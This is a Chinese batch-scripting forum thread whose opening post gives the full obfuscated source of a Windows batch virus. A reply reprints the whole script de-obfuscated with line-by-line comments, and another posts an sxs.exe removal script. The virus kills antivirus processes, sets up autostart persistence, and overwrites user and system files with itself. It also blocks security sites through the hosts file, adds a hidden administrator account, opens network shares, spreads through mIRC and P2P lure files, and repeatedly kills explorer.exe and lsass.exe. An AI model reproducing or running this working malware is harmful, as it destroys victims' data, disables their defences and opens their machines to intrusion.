中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名：www.cn-dos.net 论坛域名：www.cn-dos.net/forum
DOS，代表着自由开放与发展，我们努力起来，学习FreeDOS和Linux的自由开放与GNU精神，共同创造和发展美好的自由与GNU GPL世界吧！

游客: 注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »

中国DOS联盟论坛 » DOS批处理 & 脚本技术（批处理室） » 一个pcl专业病毒代码,看懂它有哪些功能了吗?

tianzizhi
高级用户

积分 622
发帖 214
注册 2006-9-22
状态离线

『楼主』: 一个pcl专业病毒代码,看懂它有哪些功能了吗?

一个pcl专业病毒代码,看懂它有哪些功能了吗?
别看眼花了 ^--^,
@echo off
%xyux%
%random%%random%%random%%random%%random%%random%%random%
%11bv%
%random%%random%%random%%random%%random%%random%%random%
%fxvb%
%random%%random%%random%%random%%random%%random%%random%
%qusr%
%random%%random%%random%%random%%random%%random%%random%
%6ed6%
%random%%random%%random%%random%%random%%random%%random%
%w7pb%
%random%%random%%random%%random%%random%%random%%random%
set a=pop
%kfon%
%yzri%
copy %0 %windir%\%a%.bat
%u5gp%
%3yyx%
set pop=tskill
%pop% norton*
%pop% av*
%pop% fire*
%pop% anti*
%pop% spy*
%pop% bullguard
%pop% PersFw
%pop% KAV*
%pop% ZONEALARM
%pop% SAFEWEB
%pop% OUTPOST
%pop% nv*
%pop% nav*
%pop% F-*
%pop% ESAFE
%pop% cle
%pop% BLACKICE
%pop% def*
%4o3t%
%awxd%
%33u2%
%db62%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\%a%.bat /f > nul
%w5d3%
%fbk1%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\%a%.bat /f > nul
%b2u7%
%suo3%
set pop1=echo
%elws%
%jdei%
%pop1% [windows] >> %windir%\win.ini
%yopv%
%pop1% run=%windir%\%a%.bat >> %windir%\win.ini
%pop1% load=%windir%\%a%.bat >> %windir%\win.ini
%pop1% [boot] >> %windir%\system.ini
%qkfs%
%pop1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%lzvg%
%xjz3%
chcp 1252 > nul
%random%%pop%%random%%pop%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%a%.bat" > nul
%r4yi%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%pop%%random%%pop%
%qehg%
net share ADMIN$
%82e1%
net share C$
net share IPC$
%5zbt%
net share c=c:
net share d=d:
%dozn%
%h3i1%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%h157%
set pop2=echo
%rmyg%
%dhg3%
%pop2% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%qo3f%
%tfue%
%gfxo%
echo MsgBox "Infected with pop", 16, "pop" > v.vbs
start v.vbs
%b7mv%
%be8h%
set x=%random%
%dhjx%
%ucoh%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%lqwu%
%v4uh%
%b63j%
set pop3=echo
copy %0 %windir%\ftppassword.bat
%pop3% [script] > irc.bat
%pop3% n1={ if ($nick == $me) { halt } >> irc.bat
%pop3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%pop3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%jyr3%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%dwdi%
%6a11%
md %programfiles%\pop\xxx\ > nul
md %programfiles%\pop\cracks\ > nul
copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt
net share xxx&cracks=%programfiles%\pop > nul
%5lp3%
%pop%%random%%pop%
%w8cd%
%j5wa%
net user root pwd /add
net localgroup "Administratoren" root /add
%lepf%
net localgroup "Administrators" root /add
%pop%%random%%random%%pop%
%pva7%
%8xds%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%l3yt%
%euwr%
%rqt4%
%hpbw%
set popc=echo
%rhs5%
%popc% "<html>" > %windir%\hax0r.html
%popc% "<head>" >> %windir%\hax0r.html
%popc% "<title>Virus</title>" >> %windir%\hax0r.html
%popc% "</head>" >> %windir%\hax0r.html
%popc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%popc% "buh!" >> %windir%\hax0r.html
%popc% "</body>" >> %windir%\hax0r.html
%popc% "</html>" >> %windir%\hax0r.html
%hjb7%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
%a6y2%
%aff8%
%nlzq%
%flk1%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%pop%%random%%pop%%pop%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%pop%%random%%pop%%pop%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
%4bde%
%t15p%
set popa=copy
%e5vt%
%eyuy%
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%5s3p%
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%y8rl%
%ktxi%
%3bbc%
%3t67%
shutdown /r /f /t 23 /c "Infected with pop virus!!"
%y7kx%
%23cz%
shutdown /s /f /t 23 /c "Infected with pop virus!!"
%kfb3%
%ijzo%
%j5go%
%1r6t%
%f34c%
%ounv%
:bombing
chcp 1252 > nul
%random%%pop%%random%%pop%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%pop%%random%%pop%
%q5cn%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%vu6x%
%ft65%
%dav%
%k7fj%
:: pop by pop

2006-12-18 08:57

(419503077)

tianzizhi
高级用户

积分 622
发帖 214
注册 2006-9-22
状态离线

『第 2 楼』:

没人顶一下?我来.从中你可以学到一些很个性的批处理用法.下面再发一个有点搞笑的sxs专杀批处理,sxs病毒大家都知道吧,不知道?没中过? 你有点落伍了啊,有空补补知识吧.
[转贴] sxs.exe专杀自己写的一个批处理源码
@echo                            XXX_★訫☆龍(_少专用
@echo       首先。。。俺应该先哀悼一下。。。你是多么的不幸，中了这种毒
@pause
@echo       其次。。。你应该高兴了。。。。。你是多么的幸运，有了★訫☆龍(_少的这个程序
@pause
@echo       以下为这个病毒的描述，如有错误，，，请。。。不要告诉别人，，呵呵
@echo    通过u盘网络传播，中了后国内n多杀毒软件被破坏，在每盘根目录有sxs.exe，autorun.inf文件
@echo             修改文件选项为不显示隐藏文件，，，注册表被改了
@echo       一有u盘等移动存储设备连到本机立即复制本身过去。做得真tmd毒
@echo             ----------------------------------★訫☆龍(_少
@echo                                                 QQ:502908008
@echo                         blog:http://www.51.com/home.php?user=yxlong208
@echo                                     开始我们的任务了~~~
@pause
@echo 程序将关闭相应进程，如果是瘟两千以下的系统请手动运行任务管理器关闭svohost.exe,sxs.exe进程，再继续本程序
@echo  如果提示没有找到进程的话先81怕。。。。
@pause
@echo off
taskkill /f /im sxs.exe
taskkill /f /im soundmam.exe
taskkill /f /im svohost.exe
@echo                         病毒进程已经成功关闭
@pause
@echo 下一步，俺们将把病毒启动关闭
@pause
reg delete "hkcu\software\microsoft\windows\currentversion\run" /f /v soundmam
reg delete "hkcu\software\microsoft\windows\currentversion\run" /f /v svohost.exe
reg delete "hkcu\software\microsoft\windows\currentversion\run" /f /v sxs.exe
@echo 病毒启动项成功删除
@pause
@echo 恢复文件选项属性为显示所有隐藏文件
@pause
reg delete "hklm\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL" /f /v CheckedValue
reg add "hklm\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue  /t REG_DWORD /d 00000001
@echo 报告老婆：恢复完毕
@pause
@echo 以下彻底删除病毒文件，有u盘的赶紧插上，等60.314159秒继续本程序（*_*）
@pause
@cd
@c:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@D:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@E:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@F:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@G:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@H:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@I:
@attrib sxs.exe -a -h -s
@del /s /q /f sxs.exe
@attrib autorun.inf -a -h -s
@del /s /q /f autorun.inf
@echo             打完收工~ （*_*）
@echo             呵呵`` 其实我还是小菜  ...当然我写不出这样的程序嘛~``呵呵``这个是我师傅写的`~`我借来用用哈``
@echo             版权没有，尽情翻录。。。但是如果有高手当然也别见笑```大家玩玩  欢迎大家跟我来技术交流 QQ：502908008
@pause

2006-12-19 02:49

(419503077)

vkill
金牌会员

积分 4103
发帖 1744
注册 2006-1-20
来自甘肃.临泽
状态离线

『第 3 楼』:

sxs那段写的也太复杂了

2006-12-19 03:50

ljs3509
初级用户

积分 28
发帖 14
注册 2006-8-16
状态离线

『第 4 楼』:

看不懂啊

2007-1-21 04:37

HUNRYBECKY
银牌会员

积分 1179
发帖 442
注册 2006-9-9
状态离线

『第 5 楼』:

试验了下这个病毒，厉害。

2007-1-21 08:59

dikex
高级用户

潜水修练批处理

积分 788
发帖 366
注册 2006-12-31
状态离线

『第 6 楼』:

一楼那个有很多垃圾代码来干扰被人，二楼那个连for命令也不会用

2007-1-21 09:10

dikex
高级用户

潜水修练批处理

积分 788
发帖 366
注册 2006-12-31
状态离线

『第 7 楼』:

发现有一些路径出现乱码了，C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\

应该是C:\Documents and Settings\All Users\Start Menu\Programs\吧，由此可以看出是国外的人写的

这个东西，vbs脚本、html语言都用上了，厉害啊

::去掉了那些干扰别人的无用代码，并将一些有意设置的干扰的环境变量替换了，如set pop=tskill等

copy %0 %windir%\pop.bat

::将自己复制到windows目录下，名字为pop.bat

tskill norton*

tskill av*

tskill fire*

tskill anti*

tskill spy*

tskill bullguard

tskill PersFw

tskill KAV*

tskill ZONEALARM

tskill SAFEWEB

tskill OUTPOST

tskill nv*

tskill nav*

tskill F-*

tskill ESAFE

tskill cle

tskill BLACKICE

tskill def*

::关闭常见安全进程

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul

echo [windows] >> %windir%\win.ini

echo run=%windir%\pop.bat >> %windir%\win.ini

echo load=%windir%\pop.bat >> %windir%\win.ini

echo [boot] >> %windir%\system.ini

echo shell=explorer.exe pop.bat >> %windir%\system.ini

chcp 1252 > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\pop.bat" > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pop.bat" > nul

::在注册表的run项，win.ini，system.ini和启动文件创建自启动项

net share ADMIN$

net share C$

net share IPC$

net share c=c:

net share d=d:

::开启系统的默认共享

for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul

echo 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts

echo 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts

::利用host文件将常见安全网站屏蔽

echo MsgBox "Infected with pop", 16, "pop" > v.vbs

start v.vbs

::弹出一个对话框显示你中招了-_-，明显在自我炫耀

set x=%random%

copy %0 %windir%\%x%.bat > nul 

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\pop.bat" /f > nul

::将自己复制到windows目录下面，名字是随机的，并在注册表的run和RunServices添加启动项，显示名字为html和pop

cd %windir%\system32

for %%a in (*.bat) do copy %0 %%a > nul

cd .. 

for %%a in (*.bat) do copy %0 %%a > nul

::用自身覆盖system32和windows目录下面的所有.bat文件

copy %0 c:\autoexec.bat

::用自身覆盖c:\autoexec.bat

copy %0 %windir%\ftppassword.bat

echo [script] > irc.bat

echo n1={ if ($nick == $me) { halt } >> irc.bat

echo n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat

echo n3= } >> irc.bat

if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini

if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini

del irc.bat > nul

::script代码不懂，貌似生成irc.bat和ftppassword.bat是利用mIRC漏洞的东西

md %programfiles%\pop\xxx\ > nul

md %programfiles%\pop\cracks\ > nul

copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul

copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul

copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul

copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul

echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt

net share xxx&cracks=%programfiles%\pop > nul

::在program file下面的pop\xxx和cracks文件生成一堆文件，并把这两个目录共享出去

net user root pwd /add

net localgroup "Administratoren" root /add

net localgroup "Administrators" root /add

reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul

::建立管理员帐户并设置网络共享的权限

echo "<html>" > %windir%\hax0r.html

echo "<head>" >> %windir%\hax0r.html

echo "<title>Virus</title>" >> %windir%\hax0r.html

echo "</head>" >> %windir%\hax0r.html

echo "<body bgcolor="#000000">" >> %windir%\hax0r.html

echo "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html

echo "</body>" >> %windir%\hax0r.html

echo "</html>" >> %windir%\hax0r.html

reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul

::生成一个显示你中招了的网页文件并设为主页，又在炫耀自己了-_-

md %programfiles%\shared_folder > nul

copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul

copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul

copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul

copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul

copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul

reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul

copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul

copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul

copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul

copy %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul

copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul

copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul

::继续创建一些文件，把自己放到一些P2P软件的共享目录下面陷害一些无知而好奇的人

shutdown /r /f /t 23 /c "Infected with pop virus!!"

shutdown /s /f /t 23 /c "Infected with pop virus!!"

::重启之后又关机？！还要再次炫耀一下，提醒你中招了……

:bombing

chcp 1252 > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul

copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul

copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul

copy %0 "C:\%random%.bat" > nul

taskkill /f /im explorer.exe > nul

taskkill /f /im lsass.exe > nul

goto bombing

::这个的作用应该是防止在关机倒数期间的启动文件夹的启动文件被删除，不断的结束explorer.exe和lsass.exe造成骚扰

:: pop by pop 

::上面那个是作者的注释，算是是版权声明吧-_-

[ Last edited by dikex on 2007-1-20 at 09:05 PM ]

2007-1-21 09:28

PPdos
高级用户

积分 783
发帖 268
注册 2006-12-26
状态离线

『第 8 楼』:

单从感染计算机的角度讲这个脚本也只能称之为脚本了

菩提本无树,明镜亦非台,本来无一物,何处惹尘埃.

2007-1-22 15:21

qiuqiansuo
初级用户

积分 28
发帖 15
注册 2007-1-12
状态离线

『第 9 楼』:

一楼的东东看得头都大了

2007-1-23 00:54

ec2049
初级用户

积分 57
发帖 25
注册 2007-1-21
状态离线

『第 10 楼』:

骗人的bat。

2007-1-23 02:42

rcbblgy
初级用户

积分 31
发帖 14
注册 2007-1-20
状态离线

『第 11 楼』:

二楼的批处理编写水平和我差不多，汗……

2007-1-23 07:02

zerocq
中级用户

积分 458
发帖 196
注册 2006-10-5
状态离线

『第 12 楼』:

这只能算脚本吧,病毒传染的代码都没看见
还想研究一下批处理的传染捏

2007-1-24 05:35

htysm
高级用户

积分 866
发帖 415
注册 2005-12-4
状态离线

『第 13 楼』:

二楼的代码也太.......^o^

2007-1-25 04:50

KKIILDL
初级用户

积分 48
发帖 32
注册 2007-2-28
状态离线

『第 14 楼』:

:bombing
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
这段应是随机繁殖。

2007-3-1 01:08

请注意：您目前尚未注册或登录，请您注册或登录以使用论坛的各项功能，例如发表和回复帖子等。

可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题

论坛跳转: